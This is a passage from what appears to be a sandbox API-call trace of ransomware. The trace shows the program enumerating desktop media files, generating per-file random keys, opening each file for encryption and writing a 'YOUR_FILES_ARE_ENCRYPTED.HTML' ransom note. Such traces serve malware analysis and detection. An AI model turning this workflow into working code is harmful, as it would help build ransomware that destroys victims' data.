| out: param_1="8F") returned 2 [0123.708] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="E3") returned 2 [0123.708] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="01") returned 2 [0123.708] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="BA") returned 2 [0123.708] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="6B") returned 2 [0123.708] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="61") returned 2 [0123.708] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="39") returned 2 [0123.708] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="C1") returned 2 [0123.708] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="DE") returned 2 [0123.708] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="89") returned 2 [0123.708] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="1D") returned 2 [0123.708] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="51") returned 2 [0123.708] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="B8") returned 2 [0123.708] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="66") returned 2 [0123.708] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="03") returned 2 [0123.708] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="35") returned 2 [0123.708] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="E7") returned 2 [0123.708] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="F9") returned 2 [0123.708] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="C9") returned 2 [0123.708] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="D8") returned 2 [0123.708] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="7B") returned 2 [0123.708] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="C9") returned 2 [0123.708] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="DE") returned 2 [0123.708] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="7F") returned 2 [0123.709] lstrcpyW (in: lpString1=0x337e014, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\RdWSR\\b25p6z xED.mp3" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\RdWSR\\b25p6z xED.mp3") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\RdWSR\\b25p6z xED.mp3" [0123.709] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x336df60, NumberOfConcurrentThreads=0x0) returned 0x274 [0123.709] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x336df60, lpOverlapped=0x336df60) returned 1 [0123.709] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88c7e3d0, ftCreationTime.dwHighDateTime=0x1d6fe92, ftLastAccessTime.dwLowDateTime=0xe3427770, ftLastAccessTime.dwHighDateTime=0x1d70749, ftLastWriteTime.dwLowDateTime=0xe3427770, ftLastWriteTime.dwHighDateTime=0x1d70749, nFileSizeHigh=0x0, nFileSizeLow=0x6e7d, dwReserved0=0x19e94c, dwReserved1=0x4c2f07, cFileName="B9KHvY6g7sdT.png", cAlternateFileName="B9KHVY~1.PNG")) returned 1 [0123.709] StrStrIW (lpFirst="B9KHvY6g7sdT.png", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.710] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\RdWSR\\B9KHvY6g7sdT.png") returned 61 [0123.710] PathFindExtensionW (pszPath="B9KHvY6g7sdT.png") returned=".png" [0123.710] lstrlenW (lpString=".png") returned 4 [0123.710] PathFindExtensionW (pszPath="B9KHvY6g7sdT.png") returned=".png" [0123.710] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0123.710] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\RdWSR\\B9KHvY6g7sdT.png" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\tota\\rdwsr\\b9khvy6g7sdt.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x338 [0123.711] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=28285) returned 1 [0123.711] GetProcessHeap () returned 0x600000 [0123.711] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x33960b8 [0123.713] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="AA") returned 2 [0123.713] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="0B") returned 2 [0123.713] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="70") returned 2 [0123.713] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="3D") returned 2 [0123.713] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="2A") returned 2 [0123.713] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="C7") returned 2 [0123.713] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="20") returned 2 [0123.713] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="39") returned 2 [0123.713] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="05") returned 2 [0123.713] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="8A") returned 2 [0123.713] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="05") returned 2 [0123.713] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="D3") returned 2 [0123.713] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="D9") returned 2 [0123.713] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="FA") returned 2 [0123.713] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="6A") returned 2 [0123.713] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="1C") returned 2 [0123.713] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="92") returned 2 [0123.713] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="22") returned 2 [0123.713] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="D9") returned 2 [0123.713] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="11") returned 2 [0123.713] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="25") returned 2 [0123.713] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="03") returned 2 [0123.713] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="11") returned 2 [0123.713] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="88") returned 2 [0123.713] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="AD") returned 2 [0123.713] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="5D") returned 2 [0123.713] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="B6") returned 2 [0123.713] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="D0") returned 2 [0123.713] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="E1") returned 2 [0123.713] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="CE") returned 2 [0123.713] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="35") returned 2 [0123.713] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="4F") returned 2 [0123.716] lstrcpyW (in: lpString1=0x33a616c, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\RdWSR\\B9KHvY6g7sdT.png" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\RdWSR\\B9KHvY6g7sdT.png") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\RdWSR\\B9KHvY6g7sdT.png" [0123.716] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x274, CompletionKey=0x33960b8, NumberOfConcurrentThreads=0x0) returned 0x274 [0123.716] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x33960b8, lpOverlapped=0x33960b8) returned 1 [0123.716] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3cffd80, ftCreationTime.dwHighDateTime=0x1d704f0, ftLastAccessTime.dwLowDateTime=0x5f885e70, ftLastAccessTime.dwHighDateTime=0x1d70589, ftLastWriteTime.dwLowDateTime=0x5f885e70, ftLastWriteTime.dwHighDateTime=0x1d70589, nFileSizeHigh=0x0, nFileSizeLow=0x9e8a, dwReserved0=0x19e94c, dwReserved1=0x4c2f07, cFileName="o0G-d1omd0xB.flv", cAlternateFileName="O0G-D1~1.FLV")) returned 1 [0123.716] StrStrIW (lpFirst="o0G-d1omd0xB.flv", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.716] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\RdWSR\\o0G-d1omd0xB.flv") returned 61 [0123.716] PathFindExtensionW (pszPath="o0G-d1omd0xB.flv") returned=".flv" [0123.716] lstrlenW (lpString=".flv") returned 4 [0123.716] PathFindExtensionW (pszPath="o0G-d1omd0xB.flv") returned=".flv" [0123.716] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0123.716] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\RdWSR\\o0G-d1omd0xB.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\tota\\rdwsr\\o0g-d1omd0xb.flv"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x328 [0123.717] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=40586) returned 1 [0123.717] GetProcessHeap () returned 0x600000 [0123.717] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x33be210 [0123.719] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="8E") returned 2 [0123.719] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="DB") returned 2 [0123.720] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="00") returned 2 [0123.720] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="B9") returned 2 [0123.720] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="46") returned 2 [0123.720] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="CF") returned 2 [0123.720] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="AF") returned 2 [0123.720] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="70") returned 2 [0123.720] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="1A") returned 2 [0123.720] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="80") returned 2 [0123.720] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="7E") returned 2 [0123.720] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="72") returned 2 [0123.720] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="F2") returned 2 [0123.720] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="44") returned 2 [0123.720] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="9C") returned 2 [0123.720] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="8E") returned 2 [0123.720] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="54") returned 2 [0123.720] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="16") returned 2 [0123.720] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="FF") returned 2 [0123.720] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="72") returned 2 [0123.720] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="56") returned 2 [0123.720] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="0C") returned 2 [0123.720] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="61") returned 2 [0123.720] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="15") returned 2 [0123.720] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="32") returned 2 [0123.720] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="31") returned 2 [0123.720] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="B0") returned 2 [0123.720] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="6B") returned 2 [0123.720] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="CA") returned 2 [0123.720] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="AF") returned 2 [0123.720] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="99") returned 2 [0123.720] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="23") returned 2 [0123.721] lstrcpyW (in: lpString1=0x33ce2c4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\RdWSR\\o0G-d1omd0xB.flv" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\RdWSR\\o0G-d1omd0xB.flv") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\RdWSR\\o0G-d1omd0xB.flv" [0123.721] CreateIoCompletionPort (FileHandle=0x328, ExistingCompletionPort=0x274, CompletionKey=0x33be210, NumberOfConcurrentThreads=0x0) returned 0x274 [0123.721] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x33be210, lpOverlapped=0x33be210) returned 1 [0123.721] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x444e0900, ftCreationTime.dwHighDateTime=0x1d7074d, ftLastAccessTime.dwLowDateTime=0xb9a74d10, ftLastAccessTime.dwHighDateTime=0x1d70928, ftLastWriteTime.dwLowDateTime=0xb9a74d10, ftLastWriteTime.dwHighDateTime=0x1d70928, nFileSizeHigh=0x0, nFileSizeLow=0x494c, dwReserved0=0x19e94c, dwReserved1=0x4c2f07, cFileName="vkDStCANbgZSXsl.jpg", cAlternateFileName="VKDSTC~1.JPG")) returned 1 [0123.721] StrStrIW (lpFirst="vkDStCANbgZSXsl.jpg", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.721] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\RdWSR\\vkDStCANbgZSXsl.jpg") returned 64 [0123.721] PathFindExtensionW (pszPath="vkDStCANbgZSXsl.jpg") returned=".jpg" [0123.721] lstrlenW (lpString=".jpg") returned 4 [0123.721] PathFindExtensionW (pszPath="vkDStCANbgZSXsl.jpg") returned=".jpg" [0123.721] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0123.721] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\RdWSR\\vkDStCANbgZSXsl.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\tota\\rdwsr\\vkdstcanbgzsxsl.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x334 [0123.722] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=18764) returned 1 [0123.722] GetProcessHeap () returned 0x600000 [0123.722] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x33e6368 [0123.725] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="4C") returned 2 [0123.725] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="1D") returned 2 [0123.725] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="D0") returned 2 [0123.725] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="CF") returned 2 [0123.725] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="8E") returned 2 [0123.725] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="35") returned 2 [0123.725] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="AC") returned 2 [0123.725] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="DE") returned 2 [0123.725] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="EA") returned 2 [0123.725] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="AC") returned 2 [0123.725] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="D0") returned 2 [0123.725] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="E6") returned 2 [0123.725] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="98") returned 2 [0123.725] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="55") returned 2 [0123.725] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="9F") returned 2 [0123.725] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="B0") returned 2 [0123.725] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="92") returned 2 [0123.725] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="A5") returned 2 [0123.725] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="B9") returned 2 [0123.725] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="8C") returned 2 [0123.725] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="5A") returned 2 [0123.725] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="29") returned 2 [0123.725] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="FA") returned 2 [0123.725] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="E0") returned 2 [0123.725] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="79") returned 2 [0123.725] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="91") returned 2 [0123.725] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="32") returned 2 [0123.725] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="93") returned 2 [0123.725] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="44") returned 2 [0123.725] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="1C") returned 2 [0123.725] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="80") returned 2 [0123.725] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="0C") returned 2 [0123.726] lstrcpyW (in: lpString1=0x33f641c, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\RdWSR\\vkDStCANbgZSXsl.jpg" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\RdWSR\\vkDStCANbgZSXsl.jpg") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\RdWSR\\vkDStCANbgZSXsl.jpg" [0123.726] CreateIoCompletionPort (FileHandle=0x334, ExistingCompletionPort=0x274, CompletionKey=0x33e6368, NumberOfConcurrentThreads=0x0) returned 0x274 [0123.726] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x33e6368, lpOverlapped=0x33e6368) returned 1 [0123.726] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f753a00, ftCreationTime.dwHighDateTime=0x1d7049d, ftLastAccessTime.dwLowDateTime=0xb69dfde0, ftLastAccessTime.dwHighDateTime=0x1d70729, ftLastWriteTime.dwLowDateTime=0xb69dfde0, ftLastWriteTime.dwHighDateTime=0x1d70729, nFileSizeHigh=0x0, nFileSizeLow=0x915f, dwReserved0=0x19e94c, dwReserved1=0x4c2f07, cFileName="WK95y8welFGA2.mp4", cAlternateFileName="WK95Y8~1.MP4")) returned 1 [0123.727] StrStrIW (lpFirst="WK95y8welFGA2.mp4", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0123.727] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\RdWSR\\WK95y8welFGA2.mp4") returned 62 [0123.727] PathFindExtensionW (pszPath="WK95y8welFGA2.mp4") returned=".mp4" [0123.727] lstrlenW (lpString=".mp4") returned 4 [0123.727] PathFindExtensionW (pszPath="WK95y8welFGA2.mp4") returned=".mp4" [0123.727] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0123.727] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\RdWSR\\WK95y8welFGA2.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\tota\\rdwsr\\wk95y8welfga2.mp4"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x33c [0123.728] GetFileSizeEx (in: hFile=0x33c, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=37215) returned 1 [0123.728] GetProcessHeap () returned 0x600000 [0123.728] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x340e4c0 [0123.730] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="7D") returned 2 [0123.730] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="72") returned 2 [0123.731] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="19") returned 2 [0123.731] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="CB") returned 2 [0123.731] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="E8") returned 2 [0123.731] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="9C") returned 2 [0123.731] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="0F") returned 2 [0123.731] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="14") returned 2 [0123.731] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="D1") returned 2 [0123.731] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="65") returned 2 [0123.731] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="00") returned 2 [0123.731] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="E2") returned 2 [0123.731] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="97") returned 2 [0123.731] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="24") returned 2 [0123.731] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="C4") returned 2 [0123.731] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="48") returned 2 [0123.731] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="9E") returned 2 [0123.731] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="57") returned 2 [0123.731] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="1B") returned 2 [0123.731] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="D8") returned 2 [0123.731] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="CF") returned 2 [0123.731] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="BB") returned 2 [0123.731] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="C3") returned 2 [0123.731] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="20") returned 2 [0123.731] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="DB") returned 2 [0123.731] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="10") returned 2 [0123.731] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="B1") returned 2 [0123.731] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="41") returned 2 [0123.731] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="9A") returned 2 [0123.731] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="A5") returned 2 [0123.731] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="1A") returned 2 [0123.731] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="64") returned 2 [0123.732] lstrcpyW (in: lpString1=0x341e574, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\RdWSR\\WK95y8welFGA2.mp4" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\RdWSR\\WK95y8welFGA2.mp4") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\RdWSR\\WK95y8welFGA2.mp4" [0123.732] CreateIoCompletionPort (FileHandle=0x33c, ExistingCompletionPort=0x274, CompletionKey=0x340e4c0, NumberOfConcurrentThreads=0x0) returned 0x274 [0123.732] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x340e4c0, lpOverlapped=0x340e4c0) returned 1 [0123.732] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f753a00, ftCreationTime.dwHighDateTime=0x1d7049d, ftLastAccessTime.dwLowDateTime=0xb69dfde0, ftLastAccessTime.dwHighDateTime=0x1d70729, ftLastWriteTime.dwLowDateTime=0xb69dfde0, ftLastWriteTime.dwHighDateTime=0x1d70729, nFileSizeHigh=0x0, nFileSizeLow=0x915f, dwReserved0=0x19e94c, dwReserved1=0x4c2f07, cFileName="WK95y8welFGA2.mp4", cAlternateFileName="WK95Y8~1.MP4")) returned 0 [0123.732] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0123.732] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\RdWSR\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 74 [0123.732] GetProcessHeap () returned 0x600000 [0123.732] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x336a170 [0123.732] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\tota\\RdWSR\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\tota\\rdwsr\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0123.882] WriteFile (in: hFile=0x31c, lpBuffer=0x336a170*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x336a170*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0123.883] CloseHandle (hObject=0x31c) returned 1 [0123.884] GetProcessHeap () returned 0x600000 [0123.884] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x336a170 | out: hHeap=0x600000) returned 1 [0123.884] GetProcessHeap () returned 0x600000 [0123.884] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0123.885] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, 